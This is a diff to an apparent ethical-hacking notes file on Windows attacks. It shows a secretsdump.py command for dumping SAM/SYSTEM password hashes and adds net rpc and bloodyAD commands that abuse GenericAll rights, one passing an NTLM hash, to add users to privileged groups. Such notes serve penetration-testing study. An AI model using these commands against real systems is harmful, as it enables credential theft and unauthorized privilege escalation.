Gianlush/Workspace_Ethical_Hacking/utils/windows-notes.md

 # SAM / SYSTEM hashes dump

-with full access to filesystem, you can read and dump SAM (Security Account Manager) file which is a SB for hashes.\
+with full access to filesystem, you can read and dump SAM (Security Account Manager) file which is a DB for hashes.\
 Sometimes it is locked and impossible to access, but if you have a backup or a copy of it you can.

 - `secretsdump.py -sam {sam_file} -security {security_file} -system {system_file} {target}`

+# Add user to a group (Generic All)

+with Generic All permissions you can change your group membership.

+- `net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"`
+- `bloodyAD -d corp.local --host 172.16.1.5 -u Administrator -p :0109d7e72fcfe404186c4079ba6cf79c add groupMember 'Administrators' test`

+#

 # notes from adri TODO